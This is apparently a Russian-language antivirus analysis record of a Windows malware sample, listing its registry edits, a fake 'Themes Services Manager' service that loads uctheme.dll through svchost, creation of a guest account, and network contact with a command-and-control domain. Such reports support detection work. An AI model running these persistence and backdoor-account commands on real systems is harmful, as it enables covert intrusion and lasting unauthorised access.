Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\NWCWorkstation] 'Start' = '00000002'
- <SYSTEM32>\sc.exe start NWCWorkstation
- <SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NWCWorkstation\Parameters /v ServiceMain /t REG_SZ /d FreeTest /f
- <SYSTEM32>\svchost.exe -k netsvcs
- <SYSTEM32>\taskkill.exe /F /IM <Имя вируса>.exe
- <SYSTEM32>\cmd.exe /c <Полный путь к вирусу>.bat
- <SYSTEM32>\net1.exe localgroup %USERNAME%s guest /add
- <SYSTEM32>\sc.exe create NWCWorkstation binpath= "<SYSTEM32>\svchost.exe -k netsvcs" displayname= "Themes Services Manager" start= auto
- <SYSTEM32>\expand.exe %WINDIR%\uctheme.tmp <SYSTEM32>\uctheme.dll
- <SYSTEM32>\net1.exe user guest fuck /add
- <SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NWCWorkstation\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\uctheme.dll /f
- <SYSTEM32>\sc.exe description NWCWorkstation "Themes Services Manager"
- <Полный путь к вирусу>.bat
- <SYSTEM32>\uctheme.dll
- %WINDIR%\uctheme.tmp
- 'ww##.#aemae456.com':80
- DNS ASK ww##.#aemae456.com
- '<IP-адрес в локальной сети>':1036
- ClassName: '' WindowName: ''